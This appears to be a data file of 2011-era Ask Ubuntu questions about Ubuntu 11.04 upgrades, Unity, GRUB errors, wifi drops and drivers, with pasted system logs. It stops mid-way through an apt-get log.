42883	accidentally deleted the `` linux-image-generic ''	well i tell you that my problem started when upgrading to ubuntu 11.04 . as it happened to me when i updated ubuntu 10.04 to 10.10 , every time i installed something , i got an error when reading `` linux-image-generic '' . that time i solved it by installing a software , called ubuntu tweak , with which i deleted all temporary files and old installation packages , and i dont know very well why , it worked and the problem stopped . this time i tried to do otherwise , and follow the steps that they said in this thread : initramfs problem on 11.04 upgrade well , i purged those files and after restarting it tells me : error 15 : file not found press any key to continue ... and that gives me to choose between : 10.04.1 ubuntu lts , karel-24-generic 06/02/1932 10.04.1 ubuntu lts , karel 06.02.1932-24-generic ( recovered ) any of which leads me back to the error 15 again . i started from my old windows partition and using the ext2fsd to read the linux partition , i could retrieve the file where i had copied the error log that i had when updating , i put it here if it is useful : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 258222 files and directories currently installed . ) removing jdownloader ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for python-gmenu ... rebuilding /usr/share/applications/desktop.en_us.utf8.cache ... processing triggers for hicolor-icon-theme ... processing triggers for python-support ... setting up linux-image-2.6.38-8-generic ( 2.6.38-8.42 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.38-8-generic running postinst hook script /sbin/update-grub . searching for grub installation directory ... found : /boot/grub /etc/default/grub : line 1 : /etc/default/grub : permission denied user postinst hook script [ /sbin/update-grub ] exited with value 1 dpkg : error processing linux-image-2.6.38-8-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-2.6.38-8-generic ; however : package linux-image-2.6.38-8-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 2.6.38.8.22 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already errors were encountered while processing : linux-image-2.6.38-8-generic linux-image-generic linux-generic setting up linux-image-2.6.38-8-generic ( 2.6.38-8.42 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.38-8-generic running postinst hook script /sbin/update-grub . searching for grub installation directory ... found : /boot/grub /etc/default/grub : line 1 : /etc/default/grub : permission denied user postinst hook script [ /sbin/update-grub ] exited with value 1 dpkg : error processing linux-image-2.6.38-8-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-2.6.38-8-generic ; however : package linux-image-2.6.38-8-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 2.6.38.8.22 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured what i have to do ? is there any way to put the files that i deleted back ?
42884	remove unity from 11.04	so , i just upgraded to 11.04 ( from 10.10 ) , and really can not stand the unity interface . is there any way to go back to the 10.10 style ?
42889	upgraded to 11.04 and now most of the ui is gray and boxy	i just upgraded to 11.04 , and now most ui elements are gray and crappy looking ( see screenshot ) . when i first log in , the panel looks black ( as ambiance theme is supposed to look ) , but then after a second it turns gray and crappy-looking . title bars of windows seem to be fine , but everything else seems messed up . i 've tried changing my theme in the `` appearance '' settings and it does n't do anything besides change the title bars , and in 11.04 i ca n't seem to find any other settings related to this . how can i fix this to look like it 's supposed to look ( default 11.04 theme ) ?
42892	conky for google calendar and tasks ?	currently , i 'm using conky to display a big clock and that helps me a lot . now , i am thinking it would be really cool if i can get the schedule and task list from gmail and display them beautifully on conky . is there anyone who develops such scripts or knows where to get one of those ? thanks
42895	is there a tool to update my ppa sources.list entries after upgrading ?	when i upgrade from one version of ubuntu to the next , the upgrade tool rightly disables all my ppas , so that software compiled for or otherwise tied to the old version of ubuntu does not interfere with the new version that i just upgraded to . is there any way to automatically re-enable and update any ppas that provide packages for the new version of ubuntu ? for example , suppose i 'm currently running maverick , and i have two ppas enabled , `` foo '' and `` bar '' . suppose that `` foo '' provides packages for both maverick and natty , while `` bar '' provides packages for natty only . is there a tool i could run after updating to natty that would re-enable my `` foo '' ppa and update it to point to the natty packages , while leaving the `` bar '' ppa disabled ?
42907	how do i remap command key to be the control key on a macbook 4,1 ?	how i can switch the left command key on the keyboard of my macbook , with the left ctrl key ? and if it is possible that the command right , continue acting like the super key / windows
42909	how do i get my windows controls back ?	by accident my window top decoration seem to have dissapeared in unity . window buttons or application menus are not displayed on the top panel . how can i regain control over this window ?
42913	the 'file manager ' icon in the unity launcher opens my home folder . how can i get it to open my documents folder instead ?	i open my documents folder more often than my home folder . in unity , if i want to open documents , i click on the file manager icon in the launcher ( this opens home ) , then i click on documents in the nautilus bookmarks . i would prefer to just left-click once on that icon and have documents open directly . i am not able to drag folders into the launcher ( is this a bug ? ) to create shortcuts there . ( or is there another way to do it ? ) i am not interested in right-clicking the icon ( i know it is possible to add bookmarks in the right-click menu , but i just want to single-click that icon ) . so what can i do ?
42915	how to get rid of pidgin/purple 's statuses evil and depression ?	these statuses seem to be icq specific , i tried to remove them from ~/.purple/accounts.xml but that file gets overwritten on every start and the statuses keep coming back .
42921	ati radeon : nomodeset kernel parameter is necessary since i upgraded to kernel 2.6.38	after i upgraded to ubuntu 11.04 i could n't boot my system . after grub i had only a screwed up screen . i tried with a usb pendrive with ubuntu 11.04 installed , just a black screen . i was helped and now i know the problem is that i need to set the nomodeset parameter when booting . this way i can boot both my system with the 2.6.38 and from usb . does anybody know why this may be happening ? i 'm using an ati with opensource drivers . kernel 2.6.35 is still working correctly . maybe this sould be reported ? i read what nomodeset is used for , and it is not completely clear to me . anyone who can try to explain it and its relation to graphics drivers ? thanks !
42923	how to create a manpage ?	i am packaging a program for ubuntu , and i am getting a lintian warning saying my binary needs a manpage . how does one go about creating a manpage for a program ?
42926	why is it still not possible to shut-down the pc when libreoffice-quickstart is active ?	the bug already exists for a long time ( also with openoffice ) , but it seems like nobody can fix it . why is it not possible to shut-down the pc when libreoffice-quickstart is active ?
42927	checking scratched cd integrity	i 've an old music cd and it 's all scratched , is there anyway that i could check if there is any unreadable part on it ? something like fsck for cds/dvds ?
42930	how to change the color of the status bar in nautilus file ( nautilus.rc ) ?	i am editing a theme , manages to change the color of the sidebar , but i can not change the color of the status bar has the same color as the sidebar , and i want the status bar in white without changing the color of the sidebar how do i change nautilus.rc to accomplish this ?
42931	will replacing grub with burg increase my system 's boot time ?	i guess burg will require more time to start , because it displays some eye-candy graphics . if i replaced grub with burg , would the time required to boot into ubuntu be significantly longer ?
42937	how do i boot a minimal cd iso from a usb stick and use a wireless driver	i am trying to install ubuntu 11 x64 minimal but i found that i dont have a wired ethernet connection ( its broken ) but i can possibly connect wirelessly . is it possible to use the minimal cd image and add the wireless driver ? in addition , i dont have an external cd drive - will i be able to boot the minimal cd iso from a usb drive ? wireless is intel wireless wifi link 4965agn
42940	unity indicators slowly disappear after suspending laptop on dual monitor configuration	i have one quite annoying issues with unity behaviour after waking laptop up from suspend . second issue is that after waking up , list of indicators on second , smaller monitor move small amount to right , making them gradually disappear each wake up . i have nvidia gs9200m graphic card , and run on nvidia binary drivers from ubuntu repository . is there any way could stop those indicators to travel out of my second monitor ?
42942	is it possible to change language of battery status indicator ?	i installed batery status indicator as the original was not really working on my hp laptop ( stuck on estimating ... ) . it is working fine but i was wondering if it is possible to change language of that indicator to any other than english . in my case it would be polish . after installation i run update manager and usually if there is something new on my system it downloads language pack and everything is ok but in that case it did n't . it 's not a problem to use english version but it would be just nicer to have everything in the same language . any suggestions ?
42944	installing ubuntu upgrade side by side with old version	i 'd like to upgrade from ubuntu 10.04 to 11.04 , but keep the original ubuntu 10.04 . that is , instead of the new system overwriting the old one , i 'd like it to offer ubuntu 10.04 as a start up choice , whether on the boot level or on the ubuntu user-profile level . any way to achieve this ?
42950	gdm session list borked	i must have done something especially stupid , but i observe the following behavior : when i start gdm , i see the `` warning : unable to load /etc/gdm/custom.conf : file not found '' message . my gdm session list contains only to basic sessions ( an empty one and an xterm one ) available in /usr/share/xsessions . my question is : what exactly have i broken and how do i bring unity xsession config back ? if it 's as simple as copying a file into /usr/share/xsessions , i 'd be grateful if someone posted a working unity config here , since when i launch unity from xterm with simply unity , none of my settings are applied . thanks !
42952	remap capslock to control-t	i 'm attempting to replicate chromeos 's `` search '' key in ubuntu 11.04 . mapping one key to a single other key works fine ( xmodmap , etc. ) . but i have n't been able to determine how to map one key , capslock to two keys , ctrl-t .
42955	is it possible to adjust the snap feature ?	is it possible to adjust the snap feature in 11.04 ? i want something like 2/3 1/3 instead of 1/2 1/2 of the screen .
42956	bricked 10.10 only gives me initramfs	i managed to brick my ubuntu 10.10 laptop after updating to x-swat nvidia and intel drivers and now i can only get `` init not found '' when i boot , and i 'm dumped to a initramfs text console . i wo n't even let me use mount to mount the existing partitions . what can i do ?
42958	how to show goldendict in system tray ?	i have just installed goldendict on ubuntu 11.04 , but the system tray icon is missing . is there any way to show the goldendict system tray on ubuntu 11.04 ? i have tried to 'whitelist ' it via dconf-edior : [ 'javaembeddedframe ' , 'mumble ' , 'wine ' , 'goldendict ' , 'hp-systray ' ] but it does n't seem to work . if it it 's impossible to get the system tray icon to show , is there an other dictionary that will let me search for words from the system tray ?
42964	installing ubuntu desktop without all the bloat	i am thinking of installing ubuntu server then from there install a desktop environment . then i think ubuntu-desktop will not just include the desktop but other bloat too ? how can i just get the gui , plus all the required stuff like apt-get , perhaps software center etc ?
42966	syncing much faster on 11.04 than in 10.10	i am using two computers , one with ubuntu 10.10 and one with 11.04 . the computer with ubuntu 11.04 is syncing files very fast with ubuntu one . the computer with 10.10 installed takes forever . is there any way i can speed up syncing with ubuntu one on my 10.10 computer ?
42967	how to add dockbarx ( gnome ) panel applet to unity panel ?	just would like to know if that would be possible because i get used to it in gnome , but would like to use unity , not gnome because unity is more stable on my thinkpad x220 . thanks !
42972	removing dual boot with 11.04 upgrade	i am using a dual boot set up with ubuntu 10.10 and windows xp . i would like to bin windows completely and use only ubuntu . can i remove the windows xp partition while upgrading from 10.10 or do i have to upgrade using a cd and lose all my files . ( i have got them backed up )
42976	freeze when moving mouse to bottom right corner of screen since ati catalyst 11.5	today i upgraded from ati catalyst 11.4 beta to 11.5 . when i move my mouse to the bottom right corner of the screen the system becomes unresponsive for ~1 second . everywhere else is fine . i have no idea what might cause this issue . thanks for help ! update : catalyst 11.6 did not fix that bug . the system still freezes for ~1 second when the mouse cursor is moved to the bottom right corner of the screen . update 2 : finally catalyst 11.7 is released . did it fix the bug ? no , it 's still present . one `` workaround '' ( i wo n't call it fix , because it has side effects ) is to enable the swcursor in the xorg.conf which causes some flickering of the cursor but the system wont freeze anymore . summary : bug report in amd bugzilla catalyst 11.4 : works catalyst 11.5 : freeze when moving mouse to bottom right corner of screen catalyst 11.6 : freeze when moving mouse to bottom right corner of screen catalyst 11.7 : freeze when moving mouse to bottom right corner of screen catalyst 11.8 : works again : ) workaround : add option `` swcursor '' `` true '' to xorg.conf
42980	is using internet explorer 6 on playonlinux legal ?	is using ie6 through wine in ubuntu legal ? what is microsoft 's view on such distribution and use ? i asked this because there is ambiguity on using parts from your windows installation like w32codecs , microsoft fonts in linux . i have seen people claim using w32codecs is piracy .
42981	unable to open software center	when i press software center icon in a dash , nothing happens ( just blinking ) . when i try to open it via terminal , i get : traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 42 , in from softwarecenter.enums import * importerror : no module named softwarecenter.enums ubuntu 11.04 thank you !
42983	regularly losing wifi connection	i use broadcom 802.11 linux sta wireless driver , but quite often the connection drops and connects shortly after again . lspci -v | less : 02:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) subsystem : hewlett-packard company device 145c flags : bus master , fast devsel , latency 0 , irq 17 memory at 90100000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : wl kernel modules : wl , brcm80211 lshw -c network output : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 02 serial : 78 : ac : c0:56 : c6:79 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory:90010000-90010fff memory:90000000-9000ffff memory:90020000-9002ffff syslog output : may 15 18:34:20 notebook-alexander wpa_supplicant [ 644 ] : association request to the driver failed may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : associating - > associated may 15 18:34:21 notebook-alexander wpa_supplicant [ 644 ] : associated with 06:24 : fe:37:92:4b may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : associated - > 4-way handshake may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : 4-way handshake - > group handshake may 15 18:34:21 notebook-alexander wpa_supplicant [ 644 ] : wpa : key negotiation completed with 06:24 : fe:37:92:4b [ ptk=tkip gtk=tkip ] may 15 18:34:21 notebook-alexander wpa_supplicant [ 644 ] : ctrl-event-connected - connection to 06:24 : fe:37:92:4b completed ( reauth ) [ id=13 id_str= ] may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : group handshake - > completed may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : activation ( eth1/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'fritz ! box fon wlan 7170-dh8 ' . may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : activation ( eth1 ) stage 3 of 5 ( ip configure start ) scheduled . may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : activation ( eth1 ) stage 3 of 5 ( ip configure start ) started ... may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : device state change : 5 - > 7 ( reason 0 ) may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : activation ( eth1 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : dhclient started with pid 4824 may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : activation ( eth1 ) stage 3 of 5 ( ip configure start ) complete . may 15 18:34:21 notebook-alexander dhclient : internet systems consortium dhcp client 4.1.1-p1 may 15 18:34:21 notebook-alexander dhclient : copyright 2004-2010 internet systems consortium . may 15 18:34:21 notebook-alexander dhclient : all rights reserved . may 15 18:34:21 notebook-alexander dhclient : for info , please visit https : //www.isc.org/software/dhcp/ may 15 18:34:21 notebook-alexander dhclient : may 15 18:34:21 notebook-alexander dhclient : listening on lpf/eth1/ac:81:12:24 : fa:29 may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : dhcpv4 state changed nbi - > preinit may 15 18:34:21 notebook-alexander dhclient : sending on lpf/eth1/ac:81:12:24 : fa:29 may 15 18:34:21 notebook-alexander dhclient : sending on socket/fallback may 15 18:34:21 notebook-alexander dhclient : dhcprequest of 192.168.178.27 on eth1 to 255.255.255.255 port 67 may 15 18:34:21 notebook-alexander dhclient : dhcpack of 192.168.178.27 from 192.168.178.1 may 15 18:34:21 notebook-alexander dhclient : bound to 192.168.178.27 -- renewal in 386587 seconds . may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : dhcpv4 state changed preinit - > reboot may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : activation ( eth1 ) stage 4 of 5 ( ip4 configure get ) scheduled ... may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : activation ( eth1 ) stage 4 of 5 ( ip4 configure get ) started ... may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : address 192.168.178.27 may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : prefix 24 ( 255.255.255.0 ) may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : gateway 192.168.178.1 may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : nameserver '192.168.178.1' may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : domain name 'fritz.box' may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : scheduling stage 5 may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : activation ( eth1 ) stage 5 of 5 ( ip configure commit ) scheduled ... may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : done scheduling stage 5 may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : activation ( eth1 ) stage 4 of 5 ( ip4 configure get ) complete . may 15 18:34:21 notebook-alexander networkmanager [ 566 ] : activation ( eth1 ) stage 5 of 5 ( ip configure commit ) started ... may 15 18:34:21 notebook-alexander avahi-daemon [ 548 ] : joining mdns multicast group on interface eth1.ipv4 with address 192.168.178.27 . may 15 18:34:21 notebook-alexander avahi-daemon [ 548 ] : new relevant interface eth1.ipv4 for mdns . may 15 18:34:21 notebook-alexander avahi-daemon [ 548 ] : registering new address record for 192.168.178.27 on eth1.ipv4 . may 15 18:34:22 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : device state change : 7 - > 8 ( reason 0 ) may 15 18:34:22 notebook-alexander networkmanager [ 566 ] : policy set 'auto fritz ! box fon wlan 7170-dh8 ' ( eth1 ) as default for ipv4 routing and dns . may 15 18:34:22 notebook-alexander networkmanager [ 566 ] : activation ( eth1 ) successful , device activated . may 15 18:34:22 notebook-alexander networkmanager [ 566 ] : activation ( eth1 ) stage 5 of 5 ( ip configure commit ) complete . may 15 18:34:30 notebook-alexander ntpdate [ 4877 ] : adjust time server 91.189.94.4 offset 0.000983 sec may 15 18:35:31 notebook-alexander wpa_supplicant [ 644 ] : trying to associate with 00:1c:4a : d4 : f1:1e ( ssid='fritz ! box fon wlan 7170-dh8 ' freq=2437 mhz ) may 15 18:35:31 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : completed - > associating may 15 18:35:31 notebook-alexander wpa_supplicant [ 644 ] : association request to the driver failed may 15 18:35:32 notebook-alexander wpa_supplicant [ 644 ] : associated with 06:24 : fe:37:92:4b may 15 18:35:32 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : associating - > associated may 15 18:35:32 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : associated - > 4-way handshake may 15 18:35:32 notebook-alexander wpa_supplicant [ 644 ] : wpa : ie in 3/4 msg does not match with ie in beacon/proberesp ( src=06:24 : fe:37:92:4b ) may 15 18:35:32 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : 4-way handshake - > disconnected may 15 18:35:32 notebook-alexander wpa_supplicant [ 644 ] : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=0 may 15 18:35:35 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : roamed from bssid 06:24 : fe:37:92:4b ( fritz ! box fon wlan 7170-dh8 ) to ( none ) ( ( none ) ) may 15 18:35:37 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : disconnected - > scanning may 15 18:35:38 notebook-alexander wpa_supplicant [ 644 ] : trying to associate with 00:1c:4a : d4 : f1:1e ( ssid='fritz ! box fon wlan 7170-dh8 ' freq=2437 mhz ) may 15 18:35:38 notebook-alexander wpa_supplicant [ 644 ] : association request to the driver failed may 15 18:35:38 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : scanning - > associating may 15 18:35:39 notebook-alexander wpa_supplicant [ 644 ] : associated with 06:24 : fe:37:92:4b may 15 18:35:39 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : associating - > associated may 15 18:35:39 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : associated - > 4-way handshake may 15 18:35:39 notebook-alexander wpa_supplicant [ 644 ] : wpa : ie in 3/4 msg does not match with ie in beacon/proberesp ( src=06:24 : fe:37:92:4b ) may 15 18:35:39 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : 4-way handshake - > disconnected may 15 18:35:39 notebook-alexander wpa_supplicant [ 644 ] : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=0 may 15 18:35:44 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : disconnected - > scanning may 15 18:35:44 notebook-alexander wpa_supplicant [ 644 ] : trying to associate with 06:24 : fe:37:92:4b ( ssid='fritz ! box fon wlan 7170-dh8 ' freq=2437 mhz ) may 15 18:35:44 notebook-alexander wpa_supplicant [ 644 ] : association request to the driver failed may 15 18:35:44 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : scanning - > associating may 15 18:35:45 notebook-alexander wpa_supplicant [ 644 ] : associated with 06:24 : fe:37:92:4b may 15 18:35:45 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : associating - > associated may 15 18:35:45 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : associated - > 4-way handshake may 15 18:35:45 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : 4-way handshake - > group handshake may 15 18:35:45 notebook-alexander wpa_supplicant [ 644 ] : wpa : key negotiation completed with 06:24 : fe:37:92:4b [ ptk=tkip gtk=tkip ] may 15 18:35:45 notebook-alexander wpa_supplicant [ 644 ] : ctrl-event-connected - connection to 06:24 : fe:37:92:4b completed ( reauth ) [ id=13 id_str= ] may 15 18:35:45 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : group handshake - > completed may 15 18:35:47 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : roamed from bssid ( none ) ( ( none ) ) to 06:24 : fe:37:92:4b ( fritz ! box fon wlan 7170-dh8 ) may 15 18:36:31 notebook-alexander wpa_supplicant [ 644 ] : trying to associate with 00:1c:4a : d4 : f1:1e ( ssid='fritz ! box fon wlan 7170-dh8 ' freq=2437 mhz ) may 15 18:36:31 notebook-alexander wpa_supplicant [ 644 ] : association request to the driver failed may 15 18:36:31 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : completed - > associating may 15 18:36:32 notebook-alexander wpa_supplicant [ 644 ] : associated with 06:24 : fe:37:92:4b may 15 18:36:32 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : associating - > associated may 15 18:36:32 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : associated - > 4-way handshake may 15 18:36:32 notebook-alexander wpa_supplicant [ 644 ] : wpa : ie in 3/4 msg does not match with ie in beacon/proberesp ( src=06:24 : fe:37:92:4b ) may 15 18:36:32 notebook-alexander wpa_supplicant [ 644 ] : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=0 may 15 18:36:32 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : 4-way handshake - > disconnected may 15 18:36:35 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : roamed from bssid 06:24 : fe:37:92:4b ( fritz ! box fon wlan 7170-dh8 ) to ( none ) ( ( none ) ) may 15 18:36:37 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : disconnected - > scanning may 15 18:36:38 notebook-alexander wpa_supplicant [ 644 ] : trying to associate with 06:24 : fe:37:92:4b ( ssid='fritz ! box fon wlan 7170-dh8 ' freq=2437 mhz ) may 15 18:36:38 notebook-alexander wpa_supplicant [ 644 ] : association request to the driver failed may 15 18:36:38 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : scanning - > associating may 15 18:36:39 notebook-alexander wpa_supplicant [ 644 ] : associated with 06:24 : fe:37:92:4b may 15 18:36:39 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : associating - > associated may 15 18:36:39 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : associated - > 4-way handshake may 15 18:36:39 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : 4-way handshake - > group handshake may 15 18:36:39 notebook-alexander wpa_supplicant [ 644 ] : wpa : key negotiation completed with 06:24 : fe:37:92:4b [ ptk=tkip gtk=tkip ] may 15 18:36:39 notebook-alexander wpa_supplicant [ 644 ] : ctrl-event-connected - connection to 06:24 : fe:37:92:4b completed ( reauth ) [ id=13 id_str= ] may 15 18:36:39 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : group handshake - > completed may 15 18:36:39 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : completed - > group handshake may 15 18:36:39 notebook-alexander wpa_supplicant [ 644 ] : wpa : group rekeying completed with 06:24 : fe:37:92:4b [ gtk=tkip ] may 15 18:36:39 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : supplicant connection state : group handshake - > completed may 15 18:36:41 notebook-alexander networkmanager [ 566 ] : ( eth1 ) : roamed from bssid ( none ) ( ( none ) ) to 06:24 : fe:37:92:4b ( fritz ! box fon wlan 7170-dh8 )
42984	how to properly pin chrome/ium apps in their own `` application '' in unity ?	what i mean is , how can i pin a chrome/ium application and keep it to itself ? i want to click on the application and have it run in its own pin ... its hard to describe . what happens now is , when i click on an app , it runs in either an application that is already open or in the chrome/ium that is already open . it only stays to itself if you only have that one application open . if that is n't clear enough , i 'll edit this post with some screenshots . i 'm running 11.04 with a developers build of chrome .
42985	how can i gzip my web directories ?	i would like to make a compressed file of my web sites folder and send it to a backups folder , and i ca n't seem to find anything specific on google . my web folder is : /home/user/public_html/mydomain.com/ backups folder is : /home/user/backups/ some concerns would there be any issues gziping while nginx/apache running ? also i have the permission set to 755 , is this ok ? do i need to tarball before i gzip it ? will this overwrite a previous gzip ? is there a way to automatically append the date ? ... that would be great ! i have been manually doing this in cyberduck ... what a pain !
42987	where is stored the icon informations for folders	in nautilus you can change the icon of a folder , i need to know where is that data stored.. not the icon but the line that says nautilus to use some icon to some folder
42988	drivers for a brother mfc-240c printer , they still exist ?	i 'm trying to set up an old mfc-240c printer on an older box with ubuntu 10.04 for a friend . i 've found a couple of howtos but they all seem to be pretty out of date . they link to a page on the brother website where a drivers package can be found , but the page does n't exist anymore . brother does n't seem to be supporting the mfc-240c printer line . i checked the repositories and found nothing helpful . google search has just turned up the old threads and a wiki howto , all pointing to the dead link . is there any where else i can find the drivers package ?
42990	how to install pavucontrol without apt ?	i need to install pavucontrol by hand , because my apt does not work . how can i install it by hand ? i just need to get it for skype sound but my apt does not work .
42994	gui for configure - > make - > make install	i found a kde gui for the configure - > make - > make install routine , kconfigure . but , i did not try it out , since the project was last active in 2005 . is there a gui for the same for ubuntu . i know that typing out a few lines is not a hassle , but having the option to use a gui instead would n't hurt .
42996	getting a graphic on the clipboard to the disk ?	i have a graphic on the clipboard on ubuntu . what 's the quickest way to get it onto disk as a png or jpg ?
43001	apt does not work in public wifi	i get the following message when running apt on this public hotel wifi : $ sudo apt-get update ign http : //archive.canonical.com natty inrelease ign http : //security.ubuntu.com natty-security inrelease ign http : //extras.ubuntu.com natty inrelease ok http : //archive.canonical.com natty release.gpg ok http : //security.ubuntu.com natty-security release.gpg ok http : //extras.ubuntu.com natty release.gpg ign http : //de.archive.ubuntu.com natty inrelease ign http : //de.archive.ubuntu.com natty-updates inrelease ok http : //archive.canonical.com natty release ign http : //de.archive.ubuntu.com natty-security inrelease ok http : //extras.ubuntu.com natty release ok http : //security.ubuntu.com natty-security release ok http : //de.archive.ubuntu.com natty release.gpg ok http : //de.archive.ubuntu.com natty-updates release.gpg ok http : //archive.canonical.com natty/partner i386 packages hole:1 http : //de.archive.ubuntu.com natty-security release.gpg [ 198 b ] ign http : //archive.canonical.com natty/partner translationindex ok http : //extras.ubuntu.com natty/main sources ok http : //extras.ubuntu.com natty/main i386 packages ign http : //extras.ubuntu.com natty/main translationindex ok http : //de.archive.ubuntu.com natty release ok http : //security.ubuntu.com natty-security/main i386 packages ok http : //security.ubuntu.com natty-security/restricted i386 packages ok http : //security.ubuntu.com natty-security/universe i386 packages ok http : //security.ubuntu.com natty-security/multiverse i386 packages ign http : //security.ubuntu.com natty-security/main translationindex ok http : //de.archive.ubuntu.com natty-updates release ign http : //security.ubuntu.com natty-security/multiverse translationindex ign http : //security.ubuntu.com natty-security/restricted translationindex ign http : //security.ubuntu.com natty-security/universe translationindex hole:2 http : //de.archive.ubuntu.com natty-security release [ 23,2 kb ] ok http : //de.archive.ubuntu.com natty/main sources ok http : //de.archive.ubuntu.com natty/restricted sources ok http : //de.archive.ubuntu.com natty/universe sources ok http : //de.archive.ubuntu.com natty/multiverse sources ok http : //de.archive.ubuntu.com natty/main i386 packages ok http : //de.archive.ubuntu.com natty/restricted i386 packages ok http : //de.archive.ubuntu.com natty/universe i386 packages ok http : //de.archive.ubuntu.com natty/multiverse i386 packages ign http : //de.archive.ubuntu.com natty/main translationindex ign http : //de.archive.ubuntu.com natty/multiverse translationindex ign http : //de.archive.ubuntu.com natty/restricted translationindex ign http : //de.archive.ubuntu.com natty/universe translationindex ok http : //de.archive.ubuntu.com 